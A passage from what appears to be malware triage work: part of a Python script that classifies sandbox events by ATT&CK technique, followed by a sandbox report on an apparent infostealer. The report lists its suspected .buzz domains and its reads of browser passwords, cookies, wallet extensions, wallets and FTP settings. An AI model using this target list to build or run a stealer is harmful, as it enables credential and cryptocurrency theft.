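EVENTS = ("Thread sleep count", "Thread sleep time", "Thread information set",
          "Open window title or class name", "File opened", "Process queried",
          "WMI Queries")
LINE_RE = re.compile(r"^Source: (?P<src>.*?)(?P<event>%s): (?P<value>.*)$" % "|".join(EVENTS))
TID_RE = re.compile(r"TID: (\d+)")

# Reference table kept for this example (not stated by the report): what each
# observed artifact probes for, and the ATT&CK technique it falls under.
ARTIFACTS = {
    "regmonclass": ("Sysinternals Regmon window class", "T1622"),
    "filemonclass": ("Sysinternals Filemon window class", "T1622"),
    "procmon_window_class": ("Sysinternals Process Monitor window class", "T1622"),
    "ollydbg": ("OllyDbg window class", "T1622"),
    # assumption: treated as an OllyDbg probe because it is 'ollydbg' reversed
    "gbdyllo": ("'ollydbg' spelled backwards", "T1622"),
    "ntice": ("SoftICE driver device NTICE", "T1622"),
    "sice": ("SoftICE driver device SICE", "T1622"),
    "siwvid": ("SoftICE video driver device SIWVID", "T1622"),
    "debugport": ("NtQueryInformationProcess(ProcessDebugPort)", "T1622"),
    "hidefromdebugger": ("NtSetInformationThread(ThreadHideFromDebugger)", "T1622"),
}


def parse_lines(text):
    """Return (source, tid or None, event, value) for each recognised line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        tid = TID_RE.search(m["src"])
        out.append((m["src"].strip(), int(tid.group(1)) if tid else None,
                    m["event"], m["value"].strip()))
    return out


def sleep_episodes(records):
    """Pair each 'sleep count' with the next 'sleep time' of the same TID.

    Assumption (the report does not state a unit): the 's'-suffixed values are
    accumulated sleep arguments in milliseconds, so the limit -30000 is 30 s.
    """
    open_counts, episodes = {}, []
    for _, tid, event, value in records:
        if event == "Thread sleep count":
            open_counts[tid] = int(value.split()[0])
        elif event == "Thread sleep time":
            total_ms, limit_ms = [int(v) for v in re.findall(r"-(\d+)s", value)]
            count = open_counts.pop(tid, None)  # a time line may have no count line
            episodes.append({
                "tid": tid, "calls": count, "total_ms": total_ms,
                "per_call_ms": round(total_ms / count, 1) if count else None,
                "exceeds_limit": total_ms >= limit_ms,
            })
    return episodes


def classify(records):
    """Map observed artifacts to the tool or API they probe, keyed by ATT&CK id."""
    hits = defaultdict(set)
    probe_events = ("Open window title or class name", "File opened",
                    "Process queried", "Thread information set")
    for _, _, event, value in records:
        key = value.lower()
        if event in probe_events:
            label, attack = ARTIFACTS.get(key, (None, None))
            if label is None and "sysinternals" in key:
                label, attack = "Sysinternals monitor window title", "T1622"
            if label:
                hits[attack].add(f"{value}: {label}")
        elif event == "WMI Queries" and "win32_bios" in key:
            hits["T1497.001"].add("Win32_BIOS query (BIOS strings reveal hypervisors)")
    if any(e["exceeds_limit"] for e in sleep_episodes(records)):
        hits["T1497.003"].add("accumulated Sleep delays above the sandbox limit")
    return {k: sorted(v) for k, v in hits.items()}


def triage(text):
    records = parse_lines(text)
    return {"sleep": sleep_episodes(records), "techniques": classify(records)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Every thread that has both a count and a time line divides to the same 2001.0 per call, which is what a fixed Sleep argument looks like once the sandbox adds the calls up; threads that only have a time line (TID 4432 here) get no per-call figure rather than a guessed one.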

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: P0SJULJxI0.exeString found in binary or memory: hummskitnj.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: appliacnesot.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: cashfuzysao.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: inherineau.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: screwamusresz.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: rebuildeso.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: scentniej.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: mindhandru.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: prisonyfork.buzz
                Source: P0SJULJxI0.exe, 00000000.00000002.2522387589.0000000000D73000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Program Manager
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: P0SJULJxI0.exe, 00000000.00000003.2504231622.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2529181989.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: P0SJULJxI0.exe PID: 5272, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: P0SJULJxI0.exe, 00000000.00000003.2100573523.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletC
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletC
                Source: P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: P0SJULJxI0.exe, 00000000.00000003.2504979670.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
